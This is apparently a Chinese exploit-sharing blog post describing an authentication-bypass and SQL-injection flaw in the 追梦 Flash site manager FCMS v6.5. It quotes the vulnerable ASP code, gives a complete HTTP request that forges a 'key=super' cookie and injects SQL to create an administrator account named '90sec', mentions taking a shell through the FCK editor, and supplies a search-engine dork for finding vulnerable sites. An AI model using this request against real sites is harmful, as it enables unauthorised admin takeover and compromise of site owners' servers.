追梦Flash网站管理系统FCMS v6.5 漏洞

  • A+
所属分类:漏洞时代
摘要

Author:roker
xmlEditor/adminadd.asp
[php]

<%
if request.cookies(“key”)<>“super” then
response.Write(“

Author:roker
xmlEditor/adminadd.asp
[php]

<%
if request.cookies("key")<>"super" then
response.Write("

")
Response.End
end if
%>
chkuser.asp
<%
set urs=server.createobject("adodb.recordset")
sql="select * from xmlAdmin where adminName='"&Request.cookies("adminName")&"'"
urs.open sql,conn,1,3
if urs.bof or urs.eof then
response.redirect "login.asp"
response.end
end if
urs.close
set urs=nothing
%>[/php]
提交
[php]
Host: xxx.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2) Gecko/20100115 Firefox/3.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://xxx/xmlEditor/adminadd.asp
Cookie: key=super;adminName='%09or '1;
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

adminName=90sec&OSKEY=videos&newPwd=90sec&newPwd2=90sec&fullname=90sec&email=90sec%40qq.com[/php]
添加账号密码为90sec的用户 = =
后台 fck编辑器 拿shell
关键字。。
inurl:"server.asp?flowNo="

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: